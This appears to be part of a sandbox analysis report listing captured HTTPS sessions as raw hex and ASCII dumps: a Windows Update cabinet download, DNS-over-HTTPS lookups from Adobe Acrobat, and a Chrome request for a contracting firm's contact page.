                                              2024-09-27 06:18:20 UTC1390INData Raw: b0 c0 c9 21 b6 a0 56 0b b4 92 6d 78 5b 4e d0 6c 75 bd 43 5b 6f 1a 8b 16 d3 a0 c3 d8 8d 48 e9 45 e4 33 bc 93 5b 2f 97 e6 48 b1 2a 81 f2 c6 1f 7b b7 ca f9 07 1d ae 99 a4 69 de 26 f8 97 6c 35 cd 33 56 b9 8e e2 d1 52 39 9f 44 9d e0 b3 68 e1 99 55 5e 7b e2 c5 f0 1f 24 f9 41 64 91 62 72 01 de 0e 8d b6 ae 24 90 cf 0c f8 da d2 f3 51 d5 85 86 b9 1d a2 f8 7f 6e 2e 75 0d 7a e8 5a 25 a5 bc ca 82 78 ec ac e2 8a dd c3 2b a4 6b 08 70 18 aa 7c a4 96 2f a3 aa db a6 97 15 f6 a1 6e da 06 97 16 9c 96 f7 b7 09 6d a4 d8 69 51 da 3a b4 be 4c 92 c7 22 5d dc 0b 86 57 56 8d 4c 71 e1 58 8e 1c 94 af 41 f8 5b e2 c5 4b 28 3c 45 35 ea 6a 7a 6d fe 93 6b 01 9e 3f 3b fd 3b 54 53 2c 72 2c 4b 2b a4 56 ca 4c 6a a3 31 c4 b2 49 32 0d d9 c0 3c 46 a5 a5 dd eb 1f 12 9e d3 5e f0 b4 77 32 5c eb b7
                                              Data Ascii: !Vmx[NluC[oHE3[/H*{i&l53VR9DhU^{$Adbr$Qn.uzZ%x+kp|/nmiQ:L"]WVLqXA[K(<E5jzmk?;;TS,r,K+VLj1I2<F^w2\
                                              2024-09-27 06:18:20 UTC1390INData Raw: c6 ce ca 39 e6 b8 92 e6 75 11 99 23 86 39 00 97 cb 80 dc b3 2f 97 23 84 de c9 b7 6b 07 ee eb 99 f8 91 75 73 0f 86 de cf 4d d7 a1 d0 f5 6d 46 45 b2 d3 ee e4 b1 37 ac 93 3f 74 80 30 de c1 43 bf 3f 2a 04 67 70 51 1a a2 56 b0 8f 99 75 7d 23 c4 e9 e2 4f 12 78 54 ea 7e 2d f1 1f 87 27 d4 63 fb 75 90 96 f6 39 e2 d3 04 d3 33 b1 96 e1 a4 91 d3 0c 61 29 02 29 ba 48 90 c5 23 32 dc 28 ce f1 86 97 7f a8 7c 14 87 c4 fa 8b 78 4e d3 c6 7e 2a 82 d6 e9 42 df 34 57 7a e5 9a da 5b ef b6 20 46 24 77 95 d1 54 db db 98 d7 e7 41 bc 9d de 67 6c 35 9d 1e 7d 21 fc 41 a4 4b a6 f8 e3 56 d5 63 9e d2 d5 b4 eb 02 2d 2f cd fc 96 be 7c 33 c5 35 c4 8e d3 c3 14 31 c8 61 96 48 47 90 0a 00 a9 13 b4 59 5a 7d dc fa 87 c3 ad 3b c4 7a 66 ad 79 ae 6b 77 c6 e2 0f 0c 5c 5c db c7 71 3d b4 ff 00 d9 b3
                                              Data Ascii: 9u#9/#kusMmFE7?t0C?*gpQVu}#OxT~-'cu93a))H#2(|xN~*B4Wz[ F$wTAgl5}!AKVc-/|351aHGYZ};zfykw\\q=
                                              2024-09-27 06:18:20 UTC1390INData Raw: a2 f3 7c ec 2c 81 76 96 4d e1 01 67 01 c9 d7 b4 3e 1e b7 f1 0b 6b fa be b9 a5 e8 36 8d 77 6f 24 5a 9c 1a 7d de bd 34 c5 14 e5 12 ee e1 1a 35 61 8e 19 14 90 54 03 f7 08 38 b6 d0 a4 5a 85 a4 ed 35 ac 3f e9 4e 6f 66 8e fe 57 74 30 c4 84 8d ee ec 00 66 43 94 27 71 8c 21 20 14 25 69 dd 78 95 7c 5d 25 b4 3a 76 aa 74 b9 5b 2d 73 6d 74 44 de 6b 84 0a 8b 0a c8 7c bf 9b 73 a1 00 a6 f0 c7 70 20 91 42 9b 7a 1a 5b a9 d9 eb 73 78 0f 5a bf d6 6f 93 55 f1 d6 a9 e1 5b db c9 59 a3 d2 a3 b9 fb 05 90 31 a3 bc b3 89 10 61 84 cf 24 d8 5d c0 61 49 5f e1 2f 86 e5 f5 4b a8 66 d3 ac 75 0b 88 20 85 34 fb 0b 01 1d c5 d2 db 40 18 2f d9 66 86 37 48 54 90 10 cb e7 dc be 44 63 72 28 21 17 8a d5 e5 dd 6e 74 9d 43 c6 97 76 fa 4d e5 c4 70 4b a7 3c 69 22 db 88 c9 21 77 09 19 23 c1 41 91 1e
                                              Data Ascii: |,vMg>k6wo$Z}45aT8Z5?NofWt0fC'q! %ix|]%:vt[-smtDk|sp Bz[sxZoU[Y1a$]aI_/Kfu 4@/f7HTDcr(!ntCvMpK<i"!w#A
                                              2024-09-27 06:18:20 UTC1390INData Raw: a0 f7 e0 b6 d4 d6 1e 29 9b c1 d0 78 bf fe 12 1d 23 fb 3e db 4d 87 5f 8f c2 30 d8 15 86 0b 38 99 64 85 4d d2 8d c8 f8 8c 32 82 a1 59 e3 70 14 a2 3e 3c b3 c3 d6 76 76 bf 10 7c 33 fd 9f ad 5c c3 65 e1 7d 0e 2d 4e f2 f2 5b 73 13 c9 0b c8 d7 45 04 68 ef d5 2e 96 36 1b bf bf d4 60 35 eb ff 00 17 dc cb e1 fb e4 d3 3c 21 1f 86 3f e1 2a 06 08 f5 29 b3 7a 7c 96 48 d3 ec 89 b6 3f 32 28 99 63 1b 17 0c 07 44 50 30 c9 84 9c d7 c2 77 50 f6 7c af 98 ef ff 00 65 e5 d4 2e 7f 6a 67 5b 6b 48 fc 3f 1e 9d a3 dc 5a dd 43 11 7b 88 ef e0 b7 98 5b 46 11 e5 c3 00 bb 21 1b c0 e4 db 9c 81 bd 80 fb a0 0e 2b e2 2f d9 b2 54 d0 3e 31 5d 6a b7 96 d1 08 74 5d 13 49 f0 ed d3 5b 1d cf 71 73 77 3c 11 c5 2e 08 5c a2 9c 2b 12 77 05 55 c0 3f 74 7d b5 1b a4 83 2a c0 fe 34 ea 5d 6e 73 75 d0 7b 57
                                              Data Ascii: )x#>M_08dM2Yp><vv|3\e}-N[sEh.6`5<!?*)z|H?2(cDP0wP|e.jg[kH?ZC{[F!+/T>1]jt]I[qsw<.\+wU?t}*4]nsu{W
                                              2024-09-27 06:18:20 UTC1390INData Raw: d4 8c e0 8e 0e 05 69 6b 83 5e d7 b4 cd 42 fb 54 9e 19 62 44 73 ba 4b 70 1c 79 46 40 b1 8d ae 42 ed 66 90 e7 93 c8 c9 60 4a 8c ed 0a fe 43 e2 57 d2 f5 bd 62 61 a5 cf 2f d8 6e e6 5d a8 63 0f c1 61 bb e5 50 0a 60 93 9c 02 c4 72 73 5e a1 af 78 43 c0 da 17 80 a6 d7 2c 57 c5 1a 9d ee b5 a4 5f 4d a7 5c 6a 16 cd 27 95 14 4e 15 a5 da aa 0c 6b 27 9c ae 1d c6 36 b6 49 5d c4 36 49 5d b2 d5 93 3a 1f 80 5e 30 f1 4c 1a 96 ab a4 5d 58 7f c2 63 6b 6b 63 64 f0 14 ba b7 49 10 b1 55 90 06 60 bb c9 53 23 8d ec 32 22 00 91 bc 35 5e d7 bc 47 a9 f8 7f c4 fa ce 9f 7b a0 f8 ab 5e 5f b6 b4 b6 d7 16 5a 1a f9 31 42 e1 59 21 56 56 f9 f6 64 82 c7 92 73 9e 95 c4 7c 39 d3 bc 35 27 c1 c1 65 0c be 1b 87 5e f1 04 f0 43 25 96 ab 71 71 b6 f5 56 e8 c7 1e 16 19 04 88 77 e0 ee 50 57 2a c0 80 32
                                              Data Ascii: ik^BTbDsKpyF@Bf`JCWba/n]caP`rs^xC,W_M\j'Nk'6I]6I]:^0L]XckkcdIU`S#2"5^G{^_Z1BY!VVds|95'e^C%qqVwPW*2
                                              2024-09-27 06:18:20 UTC1390INData Raw: 03 9b 3a 3d af 85 ee be 0f f8 a3 48 f1 34 4c af 67 67 73 a9 69 06 e2 ed a0 11 dc 21 90 79 7e 42 2c 6b 19 57 ba 88 a8 61 99 45 c4 67 68 00 47 1e aa a7 2c 79 4c a4 ae ee 74 5f 17 34 df 05 db f8 9a 2d 02 7b dd 56 d3 4d d4 3c 40 4d ac da 78 ff 00 48 b8 d4 cc ae f3 4f e6 93 e5 08 62 37 69 01 21 3c d2 f1 ed 24 88 06 7c c7 56 1e 1e d4 3c db 1d 27 e3 34 64 6a 7b 63 b8 86 f3 48 9a d6 2d e5 0e 5b 7a a6 d8 d5 e5 3f 37 0a 02 bb 16 2e 41 dd e9 3f 19 fc 77 e1 3d 53 5d f0 5e a1 a8 eb 6f 6d af e8 b0 6f bb d3 a6 b2 b9 b3 50 d7 10 46 f9 91 d0 48 62 0b 81 98 d7 ce c9 60 8d f2 ee 61 e7 be 39 f8 49 f1 53 c3 10 e8 be 0d d4 7e cf 7b a6 df 4f 12 45 35 b5 9c b2 5a da 3c b3 04 8c c9 72 61 01 0b 3b 91 80 c5 b0 70 46 18 03 8a 9b 6e ec b8 ad 07 58 e9 5a 4c 7f 13 3c 47 67 2d fd f4 fa
                                              Data Ascii: :=H4Lggsi!y~B,kWaEghG,yLt_4-{VM<@MxHOb7i!<$|V<'4dj{cH-[z?7.A?w=S]^omoPFHb`a9IS~{OE5Z<ra;pFnXZL<Gg-
                                              2024-09-27 06:18:20 UTC1390INData Raw: ac 62 ee da e5 8e e5 59 9e 1f df 48 dc f1 bf 2e 9c 8c 80 38 20 8b 3f 6f 96 d3 c3 96 29 1e b3 75 6d 0d ad a5 91 90 db 58 09 f7 44 51 f7 4a 09 04 aa 90 3a b0 05 7c a3 f2 9d c0 11 2b 30 7e f2 b1 cf e8 3a 05 af fc 4b ad ae b0 97 6c 11 ca 3e 89 3a 48 08 2b 91 e6 0c 0f 94 90 0b e3 1d 09 eb cc 91 69 3a bd 85 dc 97 9a 7e bd 35 c7 fa 4c 88 f1 9d 2e 79 22 dc 84 e5 46 03 10 bb b0 b9 18 e3 38 24 ae 2b 69 ee b5 85 b7 d3 85 97 fc 24 8a b3 5f ec b8 6b 98 60 f3 12 37 50 db 8e 11 b0 a0 b7 1c 60 61 d4 ed c2 81 1c 33 eb b1 de c1 1c 1a 6f 88 6f 0c b3 cd f2 4d 71 1a 13 b3 0c bb ca ae d4 52 e5 80 c3 0c a8 fe 35 da 81 d9 24 21 fa 7e 99 a8 6b 36 ea ba f6 a3 a3 a4 69 1a f9 73 d9 b3 47 72 b2 b3 18 86 e0 e0 05 27 f7 8b 8d a0 86 e0 00 47 18 7e 3e d3 65 d1 b4 4b 19 a2 da 6f 65 ba 89
                                              Data Ascii: bYH.8 ?o)umXDQJ:|+0~:Kl>:H+i:~5L.y"F8$+i$_k`7P`a3ooMqR5$!~k6isGr'G~>eKoe
                                              2024-09-27 06:18:20 UTC1390INData Raw: 33 cc 67 92 42 a4 80 4c a4 96 71 fd d2 dc 85 20 61 7e e8 d6 0b c7 4a 8f cb 48 25 cc 56 b9 37 12 66 67 40 a3 04 26 37 b7 20 9e 11 57 8c 9f bb d8 64 5a 8d 8c db b9 2e 38 a8 a6 b4 b7 9b ce 2c 9b 64 9a 2f 2a 49 23 25 24 2a 33 81 bd 70 c3 1b 98 8c 1e 09 24 52 d8 cd 24 f6 a9 2c d6 93 5a 3b 67 30 cc 50 ba f3 8e 76 33 2f bf 04 f5 a7 ce 25 28 04 2e 88 db 94 92 ca 58 6d c8 dc 30 08 e4 8c 80 7b 12 0e 0e 30 68 94 8e 47 e2 27 86 2d 75 73 a7 5c 0b 5d 58 98 2f 92 6b 87 d2 ed 77 4a a8 c5 23 69 4b 85 66 0c 80 21 01 43 33 04 fb b8 5d d1 f3 7a a6 9f a5 69 b6 be 25 81 ed 6f ee 12 5b 6b bb 3d 2e f2 ea 26 df 18 b6 8e 73 33 0b 84 ce 5e 69 fe d0 4c 64 ae 51 1b 77 ca 51 1b b1 d4 b5 16 9e 05 55 d0 62 bb 9a eb 4d 9a 0b a5 96 59 a2 64 81 fc 86 9a 38 e3 da af 20 60 ca 0b aa ee 4d a7
                                              Data Ascii: 3gBLq a~JH%V7fg@&7 WdZ.8,d/*I#%$*3p$R$,Z;g0Pv3/%(.Xm0{0hG'-us\]X/kwJ#iKf!C3]zi%o[k=.&s3^iLdQwQUbMYd8 `M
                                              2024-09-27 06:18:20 UTC1390INData Raw: f9 00 0c b8 c6 08 cf 51 cf 6a e8 a4 d3 66 15 22 f4 35 7c 37 a2 ea 7b ac 2e 2d 19 23 8d 65 fb 3d c4 d6 b7 11 a9 85 fc e0 14 12 7d 98 7c a7 76 e3 80 54 12 0d 6f 5f 69 ba f6 a0 96 96 37 3a 8a 4f b0 b4 e6 0b 89 e3 8e e8 5d 06 2e d1 26 00 2d e5 ae d3 90 63 0c 24 04 30 42 36 e3 68 9e 29 b7 b0 d3 74 e6 b6 d3 ad a6 ba b4 67 68 5d f1 17 94 5b 82 08 1d 37 a1 61 9e 9b b6 9c 74 c6 96 93 e3 d5 b0 8e c3 4d b2 b5 68 ac 5a 5b 89 24 8f 6a 46 53 7b b3 2a 6d c9 c2 ae fc e0 60 90 14 8e 32 a7 b5 36 b4 4c 98 c6 1b b1 2d 66 b2 17 2b e7 4d ae cd e4 c5 72 d6 f3 5b 5f ac eb 2a 88 cc 7e 60 25 db f7 9f 31 2b b5 57 05 f1 82 14 9a a7 37 8a f4 84 d3 ed 74 79 f4 ed 6a 68 23 11 c6 b1 5c a2 66 55 42 4a 29 51 81 c1 23 a0 05 b6 a8 62 47 07 98 b5 bd 96 db c8 6d 36 da 24 79 52 35 79 1a 1c 1f
                                              Data Ascii: Qjf"5|7{.-#e=}|vTo_i7:O].&-c$0B6h)tgh][7atMhZ[$jFS{*m`26L-f+Mr[_*~`%1+W7tyjh#\fUBJ)Q#bGm6$yR5y


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.44978913.85.23.86443
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:50 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=d3K15243hDxEmop&MD=Yz1dXwpp HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept: */*
                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                              Host: slscr.update.microsoft.com
                                              2024-09-27 06:18:50 UTC560INHTTP/1.1 200 OK
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Content-Type: application/octet-stream
                                              Expires: -1
                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                              MS-CorrelationId: a2b80217-91e7-4fb1-95a3-d304ec8bf77b
                                              MS-RequestId: a110ecba-4b0a-475d-8098-a6a96c381571
                                              MS-CV: Jga8TJwXO0SyESUo.0
                                              X-Microsoft-SLSClientCache: 1440
                                              Content-Disposition: attachment; filename=environment.cab
                                              X-Content-Type-Options: nosniff
                                              Date: Fri, 27 Sep 2024 06:18:50 GMT
                                              Connection: close
                                              Content-Length: 30005
                                              2024-09-27 06:18:50 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                              2024-09-27 06:18:50 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.449795162.159.61.34434504C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:20 UTC245OUTPOST /dns-query HTTP/1.1
                                              Host: chrome.cloudflare-dns.com
                                              Connection: keep-alive
                                              Content-Length: 128
                                              Accept: application/dns-message
                                              Accept-Language: *
                                              User-Agent: Chrome
                                              Accept-Encoding: identity
                                              Content-Type: application/dns-message
                                              2024-09-27 06:19:20 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: wwwgstaticcom)TP
                                              2024-09-27 06:19:20 UTC247INHTTP/1.1 200 OK
                                              Server: cloudflare
                                              Date: Fri, 27 Sep 2024 06:19:20 GMT
                                              Content-Type: application/dns-message
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Content-Length: 468
                                              CF-RAY: 8c9961ae8e2d43ac-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-09-27 06:19:20 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 cb 00 04 8e fb 23 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: wwwgstaticcom#)


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.449796162.159.61.34434504C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:20 UTC245OUTPOST /dns-query HTTP/1.1
                                              Host: chrome.cloudflare-dns.com
                                              Connection: keep-alive
                                              Content-Length: 128
                                              Accept: application/dns-message
                                              Accept-Language: *
                                              User-Agent: Chrome
                                              Accept-Encoding: identity
                                              Content-Type: application/dns-message
                                              2024-09-27 06:19:20 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: wwwgstaticcom)TP
                                              2024-09-27 06:19:20 UTC247INHTTP/1.1 200 OK
                                              Server: cloudflare
                                              Date: Fri, 27 Sep 2024 06:19:20 GMT
                                              Content-Type: application/dns-message
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Content-Length: 468
                                              CF-RAY: 8c9961aebeef42c0-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-09-27 06:19:20 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d4 00 04 8e fb 23 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: wwwgstaticcom#)


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.465311173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:41 UTC680OUTGET /contact HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-User: ?1
                                              Sec-Fetch-Dest: document
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:19:41 UTC465INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:41 GMT
                                              Server: Apache
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Pragma: no-cache
                                              Access-Control-Allow-Credentials: true
                                              Set-Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0; path=/; HttpOnly
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2024-09-27 06:19:41 UTC7727INData Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 21 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 62 61 73 69 63 20 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 2d 2d 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 69 74 79 20 44 69 61 6d 6f 6e 64 20 43 6f 6e 74 72 61 63 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76
                                              Data Ascii: 2000<!DOCTYPE HTML><html lang="en"><head> ...=============== basic ===============--> <meta charset="UTF-8"> <title>City Diamond Contracting</title> <meta name="viewport" content="width=dev
                                              2024-09-27 06:19:41 UTC471INData Raw: 42 67 49 69 34 74 68 72 56 50 61 31 57 61 68 4b 77 4e 54 41 2b 63 48 75 76 77 61 59 37 66 44 6d 4b 39 6c 50 39 74 71 51 7a 74 67 44 54 70 57 65 42 6d 52 37 62 4b 67 6c 53 41 43 41 69 4c 76 55 47 37 73 54 76 79 58 64 67 43 2b 4a 32 42 45 59 48 62 75 38 68 77 4b 59 65 79 37 2b 62 79 72 62 38 6c 56 6f 58 39 34 47 4a 35 76 38 7a 52 41 47 41 69 4c 68 30 41 37 43 6b 35 32 73 30 41 76 74 67 54 36 4d 68 44 51 59 75 38 6c 6a 2b 56 38 42 68 4e 66 79 38 6a 2f 33 2f 43 67 41 79 52 41 47 41 69 4c 68 79 50 4c 42 54 51 74 65 35 4b 33 52 6a 67 61 75 41 58 68 37 4c 50 78 6a 34 74 6f 61 66 64 37 30 41 38 42 73 71 33 34 55 67 45 56 4d 41 49 43 49 75 72 41 65 63 6e 38 42 31 4c 73 57 4f 39 67 31 74 58 32 7a 39 67 53 39 58 59 79 63 6d 56 71 73 50 73 49 62 6a 4f 6a 32 4a 6a 76
                                              Data Ascii: BgIi4thrVPa1WahKwNTA+cHuvwaY7fDmK9lP9tqQztgDTpWeBmR7bKglSACAiLvUG7sTvyXdgC+J2BEYHbu8hwKYey7+byrb8lVoX94GJ5v8zRAGAiLh0A7Ck52s0AvtgT6MhDQYu8lj+V8BhNfy8j/3/CgAyRAGAiLhyPLBTQte5K3RjgauAXh7LPxj4toafd70A8Bsq34UgEVMAICIurAecn8B1LsWO9g1tX2z9gS9XYycmVqsPsIbjOj2Jjv
                                              2024-09-27 06:19:41 UTC2INData Raw: 0d 0a
                                              Data Ascii:
                                              2024-09-27 06:19:41 UTC8192INData Raw: 32 30 30 30 0d 0a 48 37 47 54 49 54 65 39 71 4f 35 63 6e 7a 7a 39 68 36 42 78 39 2b 77 72 59 32 75 6b 69 79 6f 2b 31 2f 55 68 59 46 41 43 4a 53 71 51 37 41 50 34 45 42 6e 71 39 7a 41 76 42 79 36 4d 59 57 62 49 32 64 78 4f 66 4c 36 63 44 62 6a 73 70 79 50 66 7a 66 67 49 37 2f 7a 53 51 46 41 43 4a 53 71 54 38 41 47 33 71 2b 78 75 33 41 58 30 49 33 74 4b 41 72 66 6f 66 2b 58 77 59 75 63 56 52 57 48 65 34 7a 45 37 35 47 48 46 4d 77 34 70 67 43 41 42 47 70 78 48 62 41 53 5a 36 76 4d 51 5a 4c 67 68 4f 4c 6b 34 47 6c 50 4a 55 39 71 39 44 57 42 6b 66 6c 72 51 72 4d 37 37 69 4f 4f 76 30 76 6f 78 51 41 69 45 69 35 42 67 4d 33 59 6b 2b 5a 76 6b 7a 44 6a 76 59 4e 65 62 70 66 71 61 57 41 33 33 6f 73 2f 33 7a 67 4c 59 66 6c 61 66 75 66 6c 45 30 42 67 49 69 55 36 79 72
                                              Data Ascii: 2000H7GTITe9qO5cnzz9h6Bx9+wrY2ukiyo+1/UhYFACJSqQ7AP4EBnq9zAvBy6MYWbI2dxOfL6cDbjspyPfzfgI7/zSQFACJSqT8AG3q+xu3AX0I3tKArfof+XwYucVRWHe4zE75GHFMw4pgCABGpxHbASZ6vMQZLghOLk4GlPJU9q9DWBkflrQrM77iOOv0voxQAiEi5BgM3Yk+ZvkzDjvYNebpfqaWA33os/3zgLYflafuflE0BgIiU6yr
                                              2024-09-27 06:19:41 UTC6INData Raw: 32 57 50 51 30 37
                                              Data Ascii: 2WPQ07
